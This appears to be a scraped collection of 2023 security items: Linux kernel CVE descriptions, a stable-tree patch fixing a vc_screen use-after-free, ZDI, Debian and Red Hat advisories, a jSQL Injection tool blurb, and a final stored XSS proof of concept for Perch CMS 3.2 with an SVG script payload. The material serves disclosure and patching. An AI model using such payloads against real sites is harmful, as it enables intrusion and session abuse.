A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_LOGOFF and SMB2_CLOSE commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.

'2219809?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-32258: Invalid Bug ID

An out-of-bounds memory access flaw was found in the Linux kernel’s TUN/TAP device driver functionality in how a user generates a malicious (too big) networking packet when napi frags is enabled. This flaw allows a local user to crash or potentially escalate their privileges on the system.

CVE-2023-3812

A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This flaw allows an attacker with local user access to cause a system crash or leak internal kernel information.

This is a note to let you know that I've just added the patch titled

    vc\_screen: move load of struct vc\_data pointer in vcs\_read() to avoid UAF

to the 6.1-stable tree which can be found at:
    http://www.kernel.org/git/?p=linux/kernel/git/stable/stable-queue.git;a=summary

The filename of the patch is:
     vc\_screen-move-load-of-struct-vc\_data-pointer-in-vcs.patch
and it can be found in the queue-6.1 subdirectory.

If you, or anyone else, feels it should not be added to the stable tree,
please let <stable@xxxxxxxxxxxxxxx> know about it.



commit 322ff296a88276d7895a7a0ecb60553cf4914e16
Author: George Kennedy <george.kennedy@xxxxxxxxxx>
Date:   Tue Jan 24 11:16:54 2023 -0500

    vc\_screen: move load of struct vc\_data pointer in vcs\_read() to avoid UAF
    
    \[ Upstream commit 226fae124b2dac217ea5436060d623ff3385bc34 \]
    
    After a call to console\_unlock() in vcs\_read() the vc\_data struct can be
    freed by vc\_deallocate(). Because of that, the struct vc\_data pointer
    load must be done at the top of while loop in vcs\_read() to avoid a UAF
    when vcs\_size() is called.
    
    Syzkaller reported a UAF in vcs\_size().
    
    BUG: KASAN: use-after-free in vcs\_size (drivers/tty/vt/vc\_screen.c:215)
    Read of size 4 at addr ffff8881137479a8 by task 4a005ed81e27e65/1537
    
    CPU: 0 PID: 1537 Comm: 4a005ed81e27e65 Not tainted 6.2.0-rc5 #1
    Hardware name: Red Hat KVM, BIOS 1.15.0-2.module
    Call Trace:
      <TASK>
    \_\_asan\_report\_load4\_noabort (mm/kasan/report\_generic.c:350)
    vcs\_size (drivers/tty/vt/vc\_screen.c:215)
    vcs\_read (drivers/tty/vt/vc\_screen.c:415)
    vfs\_read (fs/read\_write.c:468 fs/read\_write.c:450)
    ...
      </TASK>
    
    Allocated by task 1191:
    ...
    kmalloc\_trace (mm/slab\_common.c:1069)
    vc\_allocate (./include/linux/slab.h:580 ./include/linux/slab.h:720
         drivers/tty/vt/vt.c:1128 drivers/tty/vt/vt.c:1108)
    con\_install (drivers/tty/vt/vt.c:3383)
    tty\_init\_dev (drivers/tty/tty\_io.c:1301 drivers/tty/tty\_io.c:1413
         drivers/tty/tty\_io.c:1390)
    tty\_open (drivers/tty/tty\_io.c:2080 drivers/tty/tty\_io.c:2126)
    chrdev\_open (fs/char\_dev.c:415)
    do\_dentry\_open (fs/open.c:883)
    vfs\_open (fs/open.c:1014)
    ...
    
    Freed by task 1548:
    ...
    kfree (mm/slab\_common.c:1021)
    vc\_port\_destruct (drivers/tty/vt/vt.c:1094)
    tty\_port\_destructor (drivers/tty/tty\_port.c:296)
    tty\_port\_put (drivers/tty/tty\_port.c:312)
    vt\_disallocate\_all (drivers/tty/vt/vt\_ioctl.c:662 (discriminator 2))
    vt\_ioctl (drivers/tty/vt/vt\_ioctl.c:903)
    tty\_ioctl (drivers/tty/tty\_io.c:2776)
    ...
    
    The buggy address belongs to the object at ffff888113747800
      which belongs to the cache kmalloc-1k of size 1024
    The buggy address is located 424 bytes inside of
      1024-byte region \[ffff888113747800, ffff888113747c00)
    
    The buggy address belongs to the physical page:
    page:00000000b3fe6c7c refcount:1 mapcount:0 mapping:0000000000000000
         index:0x0 pfn:0x113740
    head:00000000b3fe6c7c order:3 compound\_mapcount:0 subpages\_mapcount:0
         compound\_pincount:0
    anon flags: 0x17ffffc0010200(slab|head|node=0|zone=2|lastcpupid=0x1fffff)
    raw: 0017ffffc0010200 ffff888100042dc0 0000000000000000 dead000000000001
    raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000
    page dumped because: kasan: bad access detected
    
    Memory state around the buggy address:
      ffff888113747880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff888113747900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    > ffff888113747980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
                                       ^
      ffff888113747a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff888113747a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
    ==================================================================
    Disabling lock debugging due to kernel taint
    
    Fixes: ac751efa6a0d ("console: rename acquire/release\_console\_sem() to console\_lock/unlock()")
    Reported-by: syzkaller <syzkaller@xxxxxxxxxxxxxxxx>
    Suggested-by: Jiri Slaby <jirislaby@xxxxxxxxxx>
    Signed-off-by: George Kennedy <george.kennedy@xxxxxxxxxx>
    Link: https://lore.kernel.org/r/1674577014-12374-1-git-send-email-george.kennedy@xxxxxxxxxx
    Signed-off-by: Greg Kroah-Hartman <gregkh@xxxxxxxxxxxxxxxxxxx>
    Signed-off-by: Sasha Levin <sashal@xxxxxxxxxx>

diff --git a/drivers/tty/vt/vc\_screen.c b/drivers/tty/vt/vc\_screen.c
index 1850bacdb5b0..f566eb1839dc 100644
--- a/drivers/tty/vt/vc\_screen.c
+++ b/drivers/tty/vt/vc\_screen.c
@@ -386,10 +386,6 @@ vcs\_read(struct file \*file, char \_\_user \*buf, size\_t count, loff\_t \*ppos)
 
 	uni\_mode = use\_unicode(inode);
 	attr = use\_attributes(inode);
-	ret = -ENXIO;
-	vc = vcs\_vc(inode, &viewed);
-	if (!vc)
-		goto unlock\_out;
 
 	ret = -EINVAL;
 	if (pos < 0)
@@ -407,6 +403,11 @@ vcs\_read(struct file \*file, char \_\_user \*buf, size\_t count, loff\_t \*ppos)
 		unsigned int this\_round, skip = 0;
 		int size;
 
+		ret = -ENXIO;
+		vc = vcs\_vc(inode, &viewed);
+		if (!vc)
+			goto unlock\_out;
+
 		/\* Check whether we are above size each round,
 		 \* as copy\_to\_user at the end of this loop
 		 \* could sleep.

CVE-2023-3567: move load of struct vc_data pointer in vcs_read() to avoid UAF" has been added to the 6.1-stable tree — Linux Stable Commits

A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the handling of SMB2_LOGOFF commands. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.

May 17th, 2023

**Linux Kernel ksmbd Session NULL Pointer Dereference Denial-of-Service Vulnerability****ZDI-23-700  
ZDI-CAN-20590**

CVE ID

CVE-2023-32252

CVSS SCORE

7.5, (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

AFFECTED VENDORS

Linux  

AFFECTED PRODUCTS

Kernel  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable.

The specific flaw exists within the handling of SMB2\_LOGOFF commands. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.  

ADDITIONAL DETAILS

Linux has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/torvalds/linux/commit/f5c779b7ddbda30866cf2a27c63e34158f858c73  

DISCLOSURE TIMELINE

*   2023-04-27 - Vulnerability reported to vendor
*   2023-05-17 - Coordinated public release of advisory

CREDIT

Quentin Minster (@thalium\_team)  

BACK TO ADVISORIES

CVE-2023-32252: ZDI-23-700

A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_SESSION_SETUP and SMB2_LOGOFF commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.

May 17th, 2023

**Linux Kernel ksmbd Session Race Condition Remote Code Execution Vulnerability****ZDI-23-705  
ZDI-CAN-20596**

CVE ID

CVE-2023-32257

CVSS SCORE

8.1, (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Linux  

AFFECTED PRODUCTS

Kernel  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable.

The specific flaw exists within the processing of SMB2\_SESSION\_SETUP and SMB2\_LOGOFF commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.  

ADDITIONAL DETAILS

Linux has issued an update to correct this vulnerability. More details can be found at:  
https://github.com/torvalds/linux/commit/f5c779b7ddbda30866cf2a27c63e34158f858c73  

DISCLOSURE TIMELINE

*   2023-04-27 - Vulnerability reported to vendor
*   2023-05-17 - Coordinated public release of advisory

CREDIT

Quentin Minster (@thalium\_team)  

BACK TO ADVISORIES

CVE-2023-32257: ZDI-23-705

A use-after-free flaw was found in nfc_llcp_find_local in net/nfc/llcp_core.c in NFC in the Linux kernel. This flaw allows a local user with special privileges to impact a kernel information leak issue.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-3863: cve-details

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

Red Hat Security Advisory 2023-4166-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4166-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4166  
Issue date:        2023-07-21  
CVE Names:         CVE-2023-22045 CVE-2023-22049   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382)  
(BZ#2217708)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2217708 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 8u382) [rhel-7.9.z]  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

ppc64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

ppc64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.382.b05-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.382.b05-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.382.b05-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuybJAAoJENzjgjWX9erEvHwP/3cWR+ifiWTA6xGRRCiciFn9  
ehOMpQmJGHRAen/Vd+cvWZ638V7bW4Q8gy6rPFrxeuYRYBG/hFw+3nl88hDdLxNQ  
MdsF0U14fzxIQOBgNfXvFRds+Z+I03JmDhlJ9F+Pbx/2nMfou2WYRDLdipylG0by  
JjbH7QiOBSb0XDB9dOb0TNuyHsyTavmIn6cmqDDCachxFcJObh1TAtkCX3BfaGz/  
f1pMx0Tnsd2oIvIkMTlMiax8X0wFnTnGKMemcMk6yEL9P/g8j2/grWf89+cvjC3c  
grZQ1eTa+G2VePLvLPeN0G/hAbsHYg+o5Qi60T32qMtsnN4HNVq2x3iQWCyVietW  
mvVapyLB9JpISVQRevt59NNa7eqAzLR5sR2mIk744G4nFbdWU9fKS2YM4c0oefXa  
eWsC832Ide0pdKQVF1nv/GoDEy7ri4QNzbMDCTrDzDWva/wt0MxnTKzcyalx3jEe  
RigzUJ3a7mdfAIrmoyBrdOMN+Cz3vzj00gouQZ7rSVGyL12XRbHyuRcX1WNBOMBq  
ribVBaCGaReqj3wVen+JX++UGMvHDURx7yu77JJe5VlbTKTaGSN2jUMlODwzhjOS  
9CuyYhMxj7xU4XB2XuVP5sN0n2nfcS4mK021Oe9hsJuWjuc5qfAAS2zxfHkHFxPb  
U9606GX5T3Mjp+kqVFZs  
=9Pqu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4166-01

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.89

Perch version 3.2 suffers from a cross site scripting vulnerability.

    Exploit Title: Perch v3.2 - Stored XSSApplication: Perch CmsVersion: v3.2Bugs:  XSSTechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account2. go to http://localhost/perch_v3.2/perch/core/settings/3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)

Tag

#linux